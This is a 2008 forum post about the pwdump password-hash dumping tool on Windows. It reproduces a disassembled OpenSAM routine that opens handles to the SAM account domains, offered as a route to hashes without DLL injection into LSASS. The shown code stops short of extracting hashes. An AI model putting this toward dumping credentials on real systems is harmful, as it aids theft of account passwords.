Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

pwdump on windows

  • 01-11-2008 3:10am
    #1
    Angelo Pascal
    Closed Accounts Posts: 35


    pwdump3 starts a service on the system which then loads a DLL into LSASS which connects to SAM RPC service and reads the un-syskey'd hashes, writing to stdout or file..

    I always thought this was too much code... here is the disassembled code which does it without injection.
    there is another way to use the task scheduler also, but it requires disassembly too.

    [php]
    .text:01007AE3 _OpenSAM@8 proc near ; CODE XREF: ntalias_enum()+78p
    .text:01007AE3 ; ntalias_display(x)+47p ...
    .text:01007AE3
    .text:01007AE3 ObjectAttributes= _LSA_OBJECT_ATTRIBUTES ptr -28h
    .text:01007AE3 SystemName = _LSA_UNICODE_STRING ptr -10h
    .text:01007AE3 var_8 = dword ptr -8
    .text:01007AE3 Buffer = dword ptr -4
    .text:01007AE3 Str = dword ptr 8
    .text:01007AE3 arg_4 = dword ptr 0Ch
    .text:01007AE3
    .text:01007AE3 mov edi, edi
    .text:01007AE5 push ebp
    .text:01007AE6 mov ebp, esp
    .text:01007AE8 sub esp, 28h
    .text:01007AEB push esi
    .text:01007AEC lea eax, [ebp+SystemName]
    .text:01007AEF push eax ; int
    .text:01007AF0 push [ebp+Str] ; Str
    .text:01007AF3 xor esi, esi
    .text:01007AF5 mov [ebp+var_8], esi
    .text:01007AF8 mov [ebp+Buffer], esi
    .text:01007AFB mov [ebp+SystemName.Length], 2
    .text:01007B01 mov [ebp+SystemName.Buffer], offset asc_10015F8 ; ""
    .text:01007B08 call _CreateUnicodeString@8 ; CreateUnicodeString(x,x)
    .text:01007B0D cmp eax, esi
    .text:01007B0F jnz loc_1007CB0
    .text:01007B15 mov eax, [ebp+arg_4]
    .text:01007B18 dec eax
    .text:01007B19 jz short loc_1007B2F
    .text:01007B1B dec eax
    .text:01007B1C jz short loc_1007B26
    .text:01007B1E push 57h
    .text:01007B20 pop eax
    .text:01007B21 jmp loc_1007CB0
    .text:01007B26 ;
    .text:01007B26
    .text:01007B26 loc_1007B26: ; CODE XREF: OpenSAM(x,x)+39j
    .text:01007B26 mov [ebp+Str], 203C5h
    .text:01007B2D jmp short loc_1007B36
    .text:01007B2F ;
    .text:01007B2F
    .text:01007B2F loc_1007B2F: ; CODE XREF: OpenSAM(x,x)+36j
    .text:01007B2F mov [ebp+Str], 20385h
    .text:01007B36
    .text:01007B36 loc_1007B36: ; CODE XREF: OpenSAM(x,x)+4Aj
    .text:01007B36 push ebx
    .text:01007B37 push edi
    .text:01007B38 push 18h
    .text:01007B3A pop edi
    .text:01007B3B push offset _LsaHandle ; PolicyHandle
    .text:01007B40 push 20801h ; DesiredAccess
    .text:01007B45 lea eax, [ebp+ObjectAttributes]
    .text:01007B48 push eax ; ObjectAttributes
    .text:01007B49 lea eax, [ebp+SystemName]
    .text:01007B4C push eax ; SystemName
    .text:01007B4D mov [ebp+ObjectAttributes.Length], edi
    .text:01007B50 mov [ebp+ObjectAttributes.RootDirectory], esi
    .text:01007B53 mov [ebp+ObjectAttributes.Attributes], esi
    .text:01007B56 mov [ebp+ObjectAttributes.ObjectName], esi
    .text:01007B59 mov [ebp+ObjectAttributes.SecurityDescriptor], esi
    .text:01007B5C mov [ebp+ObjectAttributes.SecurityQualityOfService], esi
    .text:01007B5F call _LsaOpenPolicy@16 ; LsaOpenPolicy(x,x,x,x)
    .text:01007B64 cmp eax, esi
    .text:01007B66 jl loc_1007C2F
    .text:01007B6C lea eax, [ebp+Buffer]
    .text:01007B6F push eax ; Buffer
    .text:01007B70 push 5 ; InformationClass
    .text:01007B72 push _LsaHandle ; PolicyHandle
    .text:01007B78 call _LsaQueryInformationPolicy@12 ; LsaQueryInformationPolicy(x,x,x)
    .text:01007B7D cmp eax, esi
    .text:01007B7F jl loc_1007C2F
    .text:01007B85 lea eax, [ebp+ObjectAttributes]
    .text:01007B88 push eax
    .text:01007B89 push 20031h
    .text:01007B8E lea eax, [ebp+var_8]
    .text:01007B91 push eax
    .text:01007B92 lea eax, [ebp+SystemName]
    .text:01007B95 push eax
    .text:01007B96 mov [ebp+ObjectAttributes.Length], edi
    .text:01007B99 mov [ebp+ObjectAttributes.RootDirectory], esi
    .text:01007B9C mov [ebp+ObjectAttributes.Attributes], esi
    .text:01007B9F mov [ebp+ObjectAttributes.ObjectName], esi
    .text:01007BA2 mov [ebp+ObjectAttributes.SecurityDescriptor], esi
    .text:01007BA5 mov [ebp+ObjectAttributes.SecurityQualityOfService], esi
    .text:01007BA8 call _SamConnect@16 ; SamConnect(x,x,x,x)
    .text:01007BAD cmp eax, esi
    .text:01007BAF jl short loc_1007C2F
    .text:01007BB1 mov eax, [ebp+Buffer]
    .text:01007BB4 push dword ptr [eax+8] ; pSid
    .text:01007BB7 call ds:__imp__GetLengthSid@4 ; GetLengthSid(x)
    .text:01007BBD mov edi, eax
    .text:01007BBF push offset _AccountDomainSid
    .text:01007BC4 push edi
    .text:01007BC5 call _AllocMem@8 ; AllocMem(x,x)
    .text:01007BCA mov ebx, eax
    .text:01007BCC cmp ebx, esi
    .text:01007BCE jnz short loc_1007C37
    .text:01007BD0 mov eax, [ebp+Buffer]
    .text:01007BD3 push dword ptr [eax+8] ; pSourceSid
    .text:01007BD6 push _AccountDomainSid ; pDestinationSid
    .text:01007BDC push edi ; nDestinationSidLength
    .text:01007BDD call ds:__imp__CopySid@12 ; CopySid(x,x,x)
    .text:01007BE3 test eax, eax
    .text:01007BE5 jnz short loc_1007BEF
    .text:01007BE7 call ds:__imp__GetLastError@0 ; GetLastError()
    .text:01007BED jmp short loc_1007C35
    .text:01007BEF ;
    .text:01007BEF
    .text:01007BEF loc_1007BEF: ; CODE XREF: OpenSAM(x,x)+102j
    .text:01007BEF mov eax, [ebp+Buffer]
    .text:01007BF2 push offset _AccountsDomainHandle
    .text:01007BF7 push dword ptr [eax+8]
    .text:01007BFA push [ebp+Str]
    .text:01007BFD push [ebp+var_8]
    .text:01007C00 call _SamOpenDomain@16 ; SamOpenDomain(x,x,x,x)
    .text:01007C05 cmp eax, esi
    .text:01007C07 jl short loc_1007C2F
    .text:01007C09 push esi
    .text:01007C0A call _NetpCreateWellKnownSids@4 ; NetpCreateWellKnownSids(x)
    .text:01007C0F cmp eax, esi
    .text:01007C11 jl short loc_1007C2F
    .text:01007C13 push offset _BuiltInDomainHandle
    .text:01007C18 push _BuiltinDomainSid
    .text:01007C1E push 20385h
    .text:01007C23 push [ebp+var_8]
    .text:01007C26 call _SamOpenDomain@16 ; SamOpenDomain(x,x,x,x)
    .text:01007C2B cmp eax, esi
    .text:01007C2D jge short loc_1007C8D
    .text:01007C2F
    .text:01007C2F loc_1007C2F: ; CODE XREF: OpenSAM(x,x)+83j
    .text:01007C2F ; OpenSAM(x,x)+9Cj ...
    .text:01007C2F push eax
    .text:01007C30 call _NetpNtStatusToApiStatus@4 ; NetpNtStatusToApiStatus(x)
    .text:01007C35
    .text:01007C35 loc_1007C35: ; CODE XREF: OpenSAM(x,x)+10Aj
    .text:01007C35 mov ebx, eax
    .text:01007C37
    .text:01007C37 loc_1007C37: ; CODE XREF: OpenSAM(x,x)+EBj
    .text:01007C37 mov eax, _BuiltInDomainHandle
    .text:01007C3C cmp eax, esi
    .text:01007C3E jz short loc_1007C4C
    .text:01007C40 push eax
    .text:01007C41 call _SamCloseHandle@4 ; SamCloseHandle(x)
    .text:01007C46 mov _BuiltInDomainHandle, esi
    .text:01007C4C
    .text:01007C4C loc_1007C4C: ; CODE XREF: OpenSAM(x,x)+15Bj
    .text:01007C4C mov eax, _AccountsDomainHandle
    .text:01007C51 cmp eax, esi
    .text:01007C53 jz short loc_1007C61
    .text:01007C55 push eax
    .text:01007C56 call _SamCloseHandle@4 ; SamCloseHandle(x)
    .text:01007C5B mov _AccountsDomainHandle, esi
    .text:01007C61
    .text:01007C61 loc_1007C61: ; CODE XREF: OpenSAM(x,x)+170j
    .text:01007C61 mov eax, _LsaHandle
    .text:01007C66 cmp eax, esi
    .text:01007C68 jz short loc_1007C76
    .text:01007C6A push eax ; ObjectHandle
    .text:01007C6B call _LsaClose@4 ; LsaClose(x)
    .text:01007C70 mov _LsaHandle, esi
    .text:01007C76
    .text:01007C76 loc_1007C76: ; CODE XREF: OpenSAM(x,x)+185j
    .text:01007C76 mov eax, _AccountDomainSid
    .text:01007C7B cmp eax, esi
    .text:01007C7D jz short loc_1007C8F
    .text:01007C7F push eax
    .text:01007C80 call _FreeMem@4 ; FreeMem(x)
    .text:01007C85 mov _AccountDomainSid, esi
    .text:01007C8B jmp short loc_1007C8F
    .text:01007C8D ;
    .text:01007C8D
    .text:01007C8D loc_1007C8D: ; CODE XREF: OpenSAM(x,x)+14Aj
    .text:01007C8D xor ebx, ebx
    .text:01007C8F
    .text:01007C8F loc_1007C8F: ; CODE XREF: OpenSAM(x,x)+19Aj
    .text:01007C8F ; OpenSAM(x,x)+1A8j
    .text:01007C8F cmp [ebp+Buffer], esi
    .text:01007C92 jz short loc_1007C9F
    .text:01007C94 push [ebp+Buffer] ; Buffer
    .text:01007C97 call _LsaFreeMemory@4 ; LsaFreeMemory(x)
    .text:01007C9C mov [ebp+Buffer], esi
    .text:01007C9F
    .text:01007C9F loc_1007C9F: ; CODE XREF: OpenSAM(x,x)+1AFj
    .text:01007C9F cmp [ebp+var_8], esi
    .text:01007CA2 jz short loc_1007CAC
    .text:01007CA4 push [ebp+var_8]
    .text:01007CA7 call _SamCloseHandle@4 ; SamCloseHandle(x)
    .text:01007CAC
    .text:01007CAC loc_1007CAC: ; CODE XREF: OpenSAM(x,x)+1BFj
    .text:01007CAC pop edi
    .text:01007CAD mov eax, ebx
    .text:01007CAF pop ebx
    .text:01007CB0
    .text:01007CB0 loc_1007CB0: ; CODE XREF: OpenSAM(x,x)+2Cj
    .text:01007CB0 ; OpenSAM(x,x)+3Ej
    .text:01007CB0 pop esi
    .text:01007CB1 leave
    .text:01007CB2 retn 8
    .text:01007CB2 _OpenSAM@8 endp
    [/php]


Advertisement